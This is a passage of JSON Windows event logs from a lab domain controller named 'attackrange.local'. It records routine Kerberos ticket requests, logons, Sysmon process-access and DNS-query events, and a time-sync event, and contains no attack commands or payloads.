{"EventTime":"2020-08-01 06:49:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220320,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-8400769$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{717E5175-FC0A-105A-7C5D-FC8AF58866F9}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-8400769$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{717E5175-FC0A-105A-7C5D-FC8AF58866F9}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220321,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-8400769$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{717E5175-FC0A-105A-7C5D-FC8AF58866F9}\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x60810010\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-8400769$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x60810010","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{717E5175-FC0A-105A-7C5D-FC8AF58866F9}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220322,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4AEE5\r\n\r\nPrivileges:\t\tSeAuditPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeAssignPrimaryTokenPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-1008","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4aee5","PrivilegeList":"SeAuditPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeAssignPrimaryTokenPrivilege","EventReceivedTime":"2020-08-01 06:49:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220323,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4AEE5\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{67264433-FB6E-CE65-FBDF-74F88412ECDB}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4aee5","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{67264433-FB6E-CE65-FBDF-74F88412ECDB}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2591,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:43.035\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:43.035","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2592,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:41.272\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  33 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:41.272","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  33 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":37,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76841,"ProcessID":1196,"ThreadID":2256,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time provider NtpClient is currently receiving valid time data from time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123->13.86.101.172:123).","Opcode":"Info","TimeSource":"time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123-&gt;13.86.101.172:123)","EventReceivedTime":"2020-08-01 06:49:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2593,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:44.051\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:44.051","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2594,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:42.773\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nProcessId: 1336\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:42.773","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2595,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:42.783\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nProcessId: 1336\r\nQueryName: attackrange.local\r\nQueryStatus: 0\r\nQueryResults: type:  2 win-dc-8400769.attackrange.local;10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:42.783","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","QueryName":"attackrange.local","QueryStatus":"0","QueryResults":"type:  2 win-dc-8400769.attackrange.local;10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2596,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:45.067\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:45.067","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2597,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:45.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 